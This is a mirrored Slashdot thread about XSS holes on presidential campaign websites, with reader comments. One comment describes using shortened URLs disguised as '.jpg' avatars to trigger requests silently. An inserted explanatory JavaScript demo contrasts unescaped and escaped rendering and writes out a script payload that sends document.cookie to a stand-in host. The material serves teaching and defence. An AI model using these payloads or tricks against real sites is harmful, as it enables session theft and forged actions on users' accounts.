Slashdot Mirror


Campaign Sites Full of Vulnerabilities

An anonymous reader writes "Bloggers have been buzzing about the new wave of "Web 2.0" campaign sites, but it seems that a lot of presidential candidates haven't bothered to protect themselves from cross-site scripting attacks. A blogger has found a collection of XSS vulnerabilities including the websites of Barack Obama, Joe Biden, John Edwards, Mitt Romney, John Cox, Newt Gingrich, Tom Tancredo, the Democratic National Committee, and even a surprise from Whitehouse.gov. Some of the holes are low-risk, but others would allow a user's accounts on the affected website to be compromised. A victim would simply have to click on a maliciously crafted link that appears to lead to the candidate's site."

7 of 36 comments

  1. There are a lot of things that can be done by TheLink · · Score: 5, Interesting

    There really is plenty that can be done nowadays, and the URL shortening sites make it possible to do even more "interesting" stuff.

    For example: some discussion boards only check the URL ending to see if it ends with jpg or gif before allowing you to specify it as your avatar.

    Most URL shortening sites allow you to add /blah.jpg to the shortened URL without grumbling, and they will just append /blah.jpg to the final expanded URL.

    So if you pick an expanded URL of http://targetsite.com/do=somethingnaughty&foo=

    And the shortened URL is say: http://shorturl.org/s/szxvnf

    Then you can specify an image to be http://shorturl.org/s/szxvnf/blah.jpg
    and it will expand to http://targetsite.com/do=somethingnaughty&foo=/blah.jpg

    And so something naughty happens without the victim even needing to click on anything.

    If the site signs URLs with the user's session cookie, and all URLs and forms must have a checksum derived from this, then that makes it harder for the attacker.

    However, if the attacker manages to inject JavaScript somewhere, that JavaScript could figure out the session cookies and other stuff. And that is why JavaScript is such a risk.

    To reduce such risks, I proposed years ago to the W3C and browser makers to have an HTML tag that disables active content, but nobody really seemed interested.

    Example:
    <shieldson lock="randomstring" allowed="java,vrml,svg" />
    disallowed material disabled
    <shieldsoff lock="randomstring"/>

    The attacker has to guess "randomstring" in order to inject active content that's not specifically allowed between <shieldson> and <shieldsoff>. Otherwise the browser will just ignore it (and/or log an error).

    Without such tags, HTML is like driving a car with 100 accelerator pedals, but not a single brake pedal. To stop you need to make sure that ALL 100 accelerator pedals are not pressed.

    Various people have said: "Just escape stuff correctly". But I think the evidence is that even though in theory people can make sure all 100 "Go" pedals are "escaped", in practice that doesn't happen well enough.

    Furthermore, if someone comes up with a new "Go" tag #101, your old escaping libraries might not escape it correctly. Whereas my proposed "brake" tag will have a "default deny" behaviour, the browser should only allow specified active content. So any new type of active content that slips through escaping will still be ignored.

    In my opinion the browser makers and browser language makers are not really interested in security.

    Oh well...

    1. Re:There are a lot of things that can be done by Spazntwich · · Score: 2, Funny

      This plan sounds about as effective as protecting your website's content by disabling right-click with javascript.

  2. Hackers = America hatin' terrorists? by cno3 · · Score: 3, Interesting

    Why plug the holes? Blaming "the other guy" for a malicious attack on your web presence makes for such good press.

  3. I dare someone by ReidMaynard · · Score: 3, Funny

    I dare someone to photoshop moustaches on the candidates' pics....

    --
    www.globaltics.net

    Political discussion for a new world

  4. Re:Why are these vulnerabilities? by ip_vjl · · Score: 3, Informative

    It's because these are exploits that can be done transparently using nothing more than a carefully crafted hyperlink.

    Let's say a malicious blogger posts a story about candidate X. He links to a page on candidate X's site that has one of these vulnerabilities. But instead of just creating a normal link, he links in a way that passes some exploit code into the page that alters its behaviour or content. Maybe changing some page content, or injecting JavaScript code that sends your cookies for that site to a handler on his blog so that he can collect login information.

    To Joe web user, he doesn't know anything is going on. His browser is reporting he is on the authentic Candidate X website (even if it was SSL) but is completely unaware that the content has been altered by a 3rd party, or that his login information is going to get sent to site Y instead of the typical login form handler, etc.

    It's not about smart users messing with the page for their OWN amusement, it's about being able to mess with someone else's page with nothing more than a hyperlink (in such a way that doesn't require "hacking" into an account on the local server). Now do you get it?
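The crafted-hyperlink attack ip_vjl describes, as an added example that is not part of the original thread: a tiny server-side template reflects a query parameter into the page, first unescaped (the kind of hole the story is about) and then HTML-escaped. The candidate and blog host names, the `q` parameter and the cookie-stealing payload are constructed for the demo.

```javascript
// Vulnerable: the search term from the URL is pasted straight into the HTML.
function renderSearchPageVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Minimal HTML escaping for text placed in element content or a quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Fixed: same template, but the reflected value can no longer open a tag.
function renderSearchPageSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// What the server sees after the browser follows the blogger's link and the
// query string is URL-decoded.
function queryFromLink(link) {
  return new URL(link).searchParams.get('q');
}

// The malicious blogger's link: it really does point at candidate X's host,
// so the address bar (and any SSL padlock) looks legitimate, but the q
// parameter carries script that ships document.cookie to the blogger's server.
const PAYLOAD = '<script>new Image().src="http://blog-y.example/c?"+document.cookie</script>';
const CRAFTED_LINK = 'https://candidate-x.example/search?q=' + encodeURIComponent(PAYLOAD);

// Crude check standing in for "would the browser execute this": does the
// rendered HTML contain an opening script element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Audit helper: feed the crafted link through a renderer and report whether
// the injected script survives into the page.
function linkReflectsScript(renderer, link) {
  return containsScriptTag(renderer(queryFromLink(link)));
}

console.log('vulnerable page executes payload:', linkReflectsScript(renderSearchPageVulnerable, CRAFTED_LINK)); // true
console.log('escaped page executes payload:', linkReflectsScript(renderSearchPageSafe, CRAFTED_LINK));          // false
console.log(renderSearchPageSafe(queryFromLink(CRAFTED_LINK)));
```

Escaping is context-specific: the table above is right for element text and quoted attributes, but a value dropped into a `<script>` block, a URL attribute or an inline event handler needs the escaping rules for that context instead.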

  5. Re:Why are these vulnerabilities? by Anonymous Coward · · Score: 4, Informative

    Still doesn't make sense. Being able to send data like that would require that the web site accept GET requests but 99% of the time sites only use the POST method.

    Hmm. Let's see what Mitt Romney thinks of your theory.

    (disclaimer: probably not what Mitt actually thinks, but you never know.)

  6. Could be worse by greg1104 · · Score: 2, Funny

    This is nothing compared to all the holes and open ports I found last time I was at the whitehouse.com site.